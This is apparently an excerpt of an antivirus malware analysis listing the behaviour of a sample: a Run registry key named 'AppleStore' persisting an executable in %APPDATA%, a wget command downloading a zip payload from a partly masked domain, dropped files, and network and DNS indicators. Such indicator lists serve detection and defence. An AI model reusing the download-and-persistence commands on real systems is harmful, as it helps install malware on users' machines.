Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'AppleStore' = '"%APPDATA%\install_browser.exe"'
- '%APPDATA%\wget.exe' -O "C:\Fei\47114\crx.zip" "http://be###user.com/ananisikerim.zip"
- '%APPDATA%\install_browser.exe'
- %APPDATA%\unzip.exe
- C:\Fei\47114\crx.zip
- %APPDATA%\install_browser.exe
- %APPDATA%\wget.exe
- %APPDATA%\unzip.exe
- %APPDATA%\wget.exe
- %APPDATA%\install_browser.exe
- 'be###user.com':80
- be###user.com/ananisikerim.zip
- DNS ASK be###user.com
- ClassName: 'Indicator' WindowName: '(null)'